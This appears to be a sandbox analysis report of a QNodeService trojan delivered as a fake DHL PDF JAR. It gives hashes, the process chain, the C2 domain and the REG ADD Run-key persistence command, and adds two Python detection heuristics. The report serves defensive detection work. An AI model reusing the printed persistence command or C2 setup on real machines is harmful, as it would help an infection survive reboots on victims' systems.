Analysis
- max time kernel: 46s
- max time network: 139s
- platform: windows10_x64
- resource: win10v20201028
- submitted: 27-11-2020 10:41

Static task: static1

Behavioral task: behavioral1
- Sample: DHL_Nov 2020 at 1.85_8BZ290_PDF.jar
- Resource: win7v20201028

Behavioral task: behavioral2
- Sample: DHL_Nov 2020 at 1.85_8BZ290_PDF.jar
- Resource: win10v20201028
General
- Target: DHL_Nov 2020 at 1.85_8BZ290_PDF.jar
- Size: 71KB
- MD5: f204d9f0175eb6a66a0e312d63477680
- SHA1: e161a465e339be0ec43ba30ee7b0c25a9b40dc0e
- SHA256: d529003a6e1708637cc07277bfbef218db0dcaec7eed84b28567910f439297ee
- SHA512: 7d0c8c20539affd05bc5ee7de1cdc4cb65e2127b7972418c686677d7b4d12e34803446f73bce0406fdeeea6ab72c9fabee5aeb81985bce1502aabaa9d531c227
Malware Config
Signatures

QNodeService
Trojan/stealer written in NodeJS and spread via Java downloader. In this run the chain is visible in the process tree below: java.exe opens the submitted JAR, which re-launches itself through javaw.exe from a copy written to C:\Users\Admin\AppData\Local\Temp\2046ecee.tmp; that stage drops a Node.js 14.12.0 runtime under C:\Users\Admin\node-v14.12.0-win-x64\ and starts node.exe with the script supplied on stdin (the "-" argument) and the C2 selector --hub-domain ntums.mooo.com. The two child node.exe instances run boot.js from C:\Users\Admin\AppData\Local\Temp\_qhub_node_vd0F0V\ with the same --hub-domain value, and the last of them installs persistence through cmd.exe and reg.exe.

Executes dropped EXE (3 IoCs)
  pid   Process
  1000  node.exe
  640   node.exe
  2828  node.exe
Adds Run key to start application (2 TTPs, 2 IoCs)
- Key created by reg.exe:
  \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
- Set value (str) by reg.exe:
  \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\a7711235-3d47-45fc-91ec-f845beae6ac6 = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\""

The value re-launches boot.vbs through cmd.exe at every logon of this user (HKCU Run, so no elevation was needed). The GUID-style value name, the cmd /C wrapper around a .vbs, and the script path under C:\Users\Admin\qhub\node\2.0.10\ are the host artefacts to hunt for.
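The Run-key write above has the traits that separate malicious autostart entries from legitimate ones: a shell wrapper, a script target, a user-writable path, a GUID value name, and reg.exe as the writer. The following Python is an added example, not part of the sandbox report or of the QNodeService sample: it scores registry "Set value" events with those traits and raises an alert only when the entry runs a script through a wrapper plus at least one more trait. The RegEvent structure, the function names and the two benign control events (an OneDrive-style autostart and a bare key creation) are constructed for the example; the first event is the one recorded in this report.

```python
import re
from dataclasses import dataclass

# Heuristic patterns. Key paths are matched case-insensitively because the report
# shows both "SOFTWARE" and "Software" spellings for the same hive path.
RUN_KEY_RE = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\", re.I)
WRAPPER_RE = re.compile(r'^\s*"?(cmd|wscript|cscript|mshta|powershell)(\.exe)?\b', re.I)
SCRIPT_EXT_RE = re.compile(r"\.(vbs|vbe|js|jse|wsf|hta|ps1|bat|cmd)\b", re.I)
USER_WRITABLE_RE = re.compile(r"(C:\\Users\\[^\\\"]+\\|%(APPDATA|LOCALAPPDATA|TEMP|TMP)%)", re.I)
GUID_RE = re.compile(r"^[0-9a-f]{8}(-[0-9a-f]{4}){3}-[0-9a-f]{12}$", re.I)


@dataclass
class RegEvent:
    process: str  # image name of the writing process, e.g. reg.exe
    path: str     # full value path as the sandbox logs it
    data: str     # REG_SZ data written (empty for a bare key creation)


def run_value_reasons(ev: RegEvent) -> list:
    """Return the reasons a Run/RunOnce value write looks like malicious persistence.
    An empty list means the event is not a Run-key value write or shows none of the traits."""
    if not RUN_KEY_RE.search(ev.path):
        return []
    value_name = ev.path.rsplit("\\", 1)[-1]
    reasons = []
    if WRAPPER_RE.match(ev.data):
        reasons.append("launched through a shell or script host")
    if SCRIPT_EXT_RE.search(ev.data):
        reasons.append("target is a script, not a binary")
    if USER_WRITABLE_RE.search(ev.data):
        reasons.append("target lives in a user-writable directory")
    if GUID_RE.match(value_name):
        reasons.append("value name is a GUID")
    if ev.process.lower() == "reg.exe":
        reasons.append("written with reg.exe rather than by an installer")
    return reasons


def is_persistence_alert(ev: RegEvent) -> bool:
    """Alert when the value runs a script or wrapper and at least one more trait is present.
    A plain autostart of a binary under AppData does not fire on its own."""
    reasons = run_value_reasons(ev)
    runs_script = any(r.startswith(("launched through", "target is a script")) for r in reasons)
    return runs_script and len(reasons) >= 2


# Constructed sample events. The first is the write recorded in this report; the other
# two are benign-looking controls invented for this example.
SID = r"\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000"
SAMPLE_EVENTS = [
    RegEvent("reg.exe",
             SID + r"\Software\Microsoft\Windows\CurrentVersion\Run\a7711235-3d47-45fc-91ec-f845beae6ac6",
             r'cmd /D /C "C:\Users\Admin\qhub\node\2.0.10\boot.vbs"'),
    RegEvent("OneDriveSetup.exe",
             SID + r"\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
             r'"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    RegEvent("reg.exe",
             SID + r"\Software\Microsoft\Windows\CurrentVersion\Run",  # key creation, no value
             ""),
]


def triage(events) -> dict:
    """Map value path -> reasons for every event that raises an alert."""
    return {ev.path: run_value_reasons(ev) for ev in events if is_persistence_alert(ev)}


if __name__ == "__main__":
    for path, reasons in triage(SAMPLE_EVENTS).items():
        print(path)
        for reason in reasons:
            print("  -", reason)
```

Run against the three constructed events only the report's GUID-named value is reported, with all five reasons; the OneDrive-style entry trips only the user-writable-path trait and stays quiet.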
JavaScript code in executable (3 IoCs)
  resource                                      yara_rule
  behavioral2/files/0x000100000001ab7b-176.dat  js
  behavioral2/files/0x000100000001ab7b-181.dat  js
  behavioral2/files/0x000100000001ab7b-185.dat  js
Looks up external IP address via web service (2 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
  flow  ioc
  21    wtfismyip.com
  22    wtfismyip.com
Checks processor information in registry (2 TTPs, 6 IoCs)
Processor information is often read in order to detect sandboxing environments. Treat this hit with care here: these are exactly the keys and values (~MHz and ProcessorNameString under each CentralProcessor\N subkey) that Node.js reads through libuv whenever a script calls os.cpus(), so any Node.js program produces them. On its own this signature says little about evasion; the value is only in whether the result is sent to the hub or used to branch.
  description        ioc                                                                         Process
  Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0                  node.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz             node.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString  node.exe
  Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1                  node.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz             node.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString  node.exe
Suspicious behavior: EnumeratesProcesses (18 IoCs)
  pid   Process   events
  1000  node.exe  4
  640   node.exe  4
  2828  node.exe  10
Suspicious use of WriteProcessMemory (12 IoCs; each row was recorded twice)
  description                      pid   Process    procid_target
  PID 944 wrote to memory of 3212  944   java.exe   77
  PID 3212 wrote to memory of 1000 3212  javaw.exe  81
  PID 1000 wrote to memory of 640  1000  node.exe   83
  PID 640 wrote to memory of 2828  640   node.exe   84
  PID 2828 wrote to memory of 3596 2828  node.exe   86
  PID 3596 wrote to memory of 1856 3596  cmd.exe    87
Processes (nesting shows parent/child depth)

1. java.exe (PID 944)
   Image: C:\ProgramData\Oracle\Java\javapath\java.exe
   Command line: java -jar "C:\Users\Admin\AppData\Local\Temp\DHL_Nov 2020 at 1.85_8BZ290_PDF.jar"
   - Suspicious use of WriteProcessMemory

  2. javaw.exe (PID 3212)
     Image: C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe
     Command line: "C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\2046ecee.tmp
     - Suspicious use of WriteProcessMemory

    3. node.exe (PID 1000)
       Image: C:\Users\Admin\node-v14.12.0-win-x64\node.exe
       Command line: C:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain ntums.mooo.com
       - Executes dropped EXE
       - Suspicious behavior: EnumeratesProcesses
       - Suspicious use of WriteProcessMemory

      4. node.exe (PID 640)
         Image: C:\Users\Admin\node-v14.12.0-win-x64\node.exe
         Command line: C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_vd0F0V\boot.js --hub-domain ntums.mooo.com
         - Executes dropped EXE
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of WriteProcessMemory

        5. node.exe (PID 2828)
           Image: C:\Users\Admin\node-v14.12.0-win-x64\node.exe
           Command line: C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_vd0F0V\boot.js --hub-domain ntums.mooo.com
           - Executes dropped EXE
           - Checks processor information in registry
           - Suspicious behavior: EnumeratesProcesses
           - Suspicious use of WriteProcessMemory

          6. cmd.exe (PID 3596)
             Image: C:\Windows\system32\cmd.exe
             Command line: C:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "a7711235-3d47-45fc-91ec-f845beae6ac6" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""
             - Suspicious use of WriteProcessMemory

            7. reg.exe (PID 1856)
               Image: C:\Windows\system32\reg.exe
               Command line: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "a7711235-3d47-45fc-91ec-f845beae6ac6" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""
               - Adds Run key to start application
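The process tree is the most reusable detection material on this page: a Java launcher running a JAR that spawns node.exe, node.exe carrying a --hub-domain argument, and a reg.exe Run-key write whose ancestry goes back through node.exe. The Python below is an added example, not part of the sandbox report or the malware: it rebuilds the parent/child tree from the PIDs and command lines recorded above (transcribed verbatim, with parent links taken from the WriteProcessMemory events) and answers those three questions in a form that can be pointed at EDR process-creation telemetry. The record layout and the function names are this example's own.

```python
import re

# Process records transcribed from the report's tree: (pid, parent pid, image name, command line).
# Parent links come from the "PID X wrote to memory of Y" events the sandbox logs at process creation.
HUB_RE = re.compile(r"--hub-domain\s+(\S+)")
NODE_CMD = (r"C:\Users\Admin\node-v14.12.0-win-x64\node.exe "
            r"C:\Users\Admin\AppData\Local\Temp\_qhub_node_vd0F0V\boot.js --hub-domain ntums.mooo.com")
REG_ADD = (r'REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" '
           r'/V "a7711235-3d47-45fc-91ec-f845beae6ac6" /t REG_SZ /F '
           r'/D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""')
PROCESSES = [
    (944,  None, "java.exe",  r'java -jar "C:\Users\Admin\AppData\Local\Temp\DHL_Nov 2020 at 1.85_8BZ290_PDF.jar"'),
    (3212, 944,  "javaw.exe", r'"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\2046ecee.tmp'),
    (1000, 3212, "node.exe",  r"C:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain ntums.mooo.com"),
    (640,  1000, "node.exe",  NODE_CMD),
    (2828, 640,  "node.exe",  NODE_CMD),
    (3596, 2828, "cmd.exe",   r'C:\Windows\system32\cmd.exe /d /s /c "' + REG_ADD + '"'),
    (1856, 3596, "reg.exe",   REG_ADD),
]


def build_tree(records):
    """Index records by pid so ancestry can be walked in O(depth)."""
    return {pid: {"pid": pid, "ppid": ppid, "image": image, "cmdline": cmdline}
            for pid, ppid, image, cmdline in records}


def lineage(tree, pid):
    """Image names from the root ancestor down to pid (cycle-safe for malformed telemetry)."""
    chain, seen = [], set()
    while pid in tree and pid not in seen:
        seen.add(pid)
        chain.append(tree[pid]["image"])
        pid = tree[pid]["ppid"]
    return chain[::-1]


def has_ancestor(tree, pid, images):
    """True if any proper ancestor of pid has an image name in `images` (lower-case set)."""
    ppid = tree[pid]["ppid"]
    while ppid in tree:
        if tree[ppid]["image"].lower() in images:
            return True
        ppid = tree[ppid]["ppid"]
    return False


def java_spawned_node(tree):
    """node.exe instances that descend from a Java launcher: the QNodeService delivery pattern."""
    return sorted(p["pid"] for p in tree.values()
                  if p["image"].lower() == "node.exe"
                  and has_ancestor(tree, p["pid"], {"java.exe", "javaw.exe"}))


def run_key_writes_under_node(tree):
    """reg.exe Run-key writes whose ancestry passes through node.exe."""
    return sorted(p["pid"] for p in tree.values()
                  if p["image"].lower() == "reg.exe"
                  and "currentversion\\run" in p["cmdline"].lower()
                  and has_ancestor(tree, p["pid"], {"node.exe"}))


def hub_domains(tree):
    """Every --hub-domain value seen on any command line (the sample's C2 selector)."""
    return sorted({m.group(1) for p in tree.values() for m in HUB_RE.finditer(p["cmdline"])})


TREE = build_tree(PROCESSES)

if __name__ == "__main__":
    print(" -> ".join(lineage(TREE, 1856)))
    print("node.exe under Java:", java_spawned_node(TREE))
    print("Run-key writes under node.exe:", run_key_writes_under_node(TREE))
    print("hub domains:", hub_domains(TREE))
```

Walking the lineage of the reg.exe write yields java.exe -> javaw.exe -> node.exe -> node.exe -> node.exe -> cmd.exe -> reg.exe; the same three predicates, applied to live process-creation events, do not depend on the dropped file names or the temp directory, which are the parts of this sample most likely to change.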